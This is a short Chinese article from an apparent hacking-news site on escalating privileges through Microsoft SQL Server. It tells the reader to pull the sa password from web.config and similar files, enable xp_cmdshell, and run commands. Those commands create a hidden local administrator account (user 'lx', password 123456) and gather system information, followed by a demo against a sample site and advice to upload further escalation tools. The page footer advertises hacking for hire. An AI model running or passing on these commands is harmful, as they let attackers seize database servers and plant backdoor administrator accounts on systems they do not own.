Sqlserver提权
手机扫一扫
黑客病毒漏洞黑防入侵DDOS病毒硬件
黑资讯> 黑客资讯>Sqlserver提权

Sqlserver提权

黑客资讯访客1970-01-01 8:00:003114A+A-

1、简介


如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码,利用提权脚本,执行命令,但是不一定的系统权限,还要看管理员开始安装sqlserver的权限设置。

 

2、查找帐号和密码


web.config
config.asp
conn.aspx
database.aspx

 

3、开启xp_cmdshell

Exec master.dbo.xp_cmdshell 'net user'

Exec sp_configure'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc DistributedQueries',1;RECONFIGURE;

Exec master.dbo.xp_cmdshell 'net user lx 123456 /add & net localgroupadministrators lx /add'

Exec master.dbo.xp_cmdshell 'systeminfo'

 

4、实战

 


http://www.demo1.com/asp.aspx

 

1.png

密码 123456
链接mssql

 

2.png

在sql2005以后

 

查看当前权限查看当前权限1559911389138157.png

查看当前权限

 

 

1559911436109748.png

 

查看当前权限也是一个普通用户。可以执行一些基础的命令,可以上传溢出提权工具 再来提高当前用户的权限。

有些时候  是一个系统权限  主要还是要看目标管理员在开始安装sqlserver的时候给的是什么样的权限。

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
黑客网站黑客接单黑客技术黑客工具网络安全渗透测试编程技术免费黑客学习网

相关文章

  • 4条评论
  • 萌懂依疚2022-06-03 03:18:20
  • 2、查找帐号和密码web.configconfig.aspconn.aspxdatabase.aspx 3、开启xp_cmdshellExec master.dbo.xp_cm
  • 馥妴栖迟2022-06-03 08:05:16
  • 3456链接mssql 在sql2005以后 查看当前权限查看当前权限查看当前权限   查看当前权限也是一个普通用户。可以执行一些基础的命令,可以上传溢出提权工具 再来提高当前用户的权限。有些时
  • 惑心私野2022-06-03 03:42:47
  • ECONFIGURE;Exec master.dbo.xp_cmdshell 'net user lx 123456 /add & net localgroupadministrators 
  • 俗野嘤咛2022-06-03 02:57:44
  • ll 'net user lx 123456 /add & net localgroupadministrators lx /add'Exec master.dbo.xp_cmdshell 'systeminfo'
发表评论

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理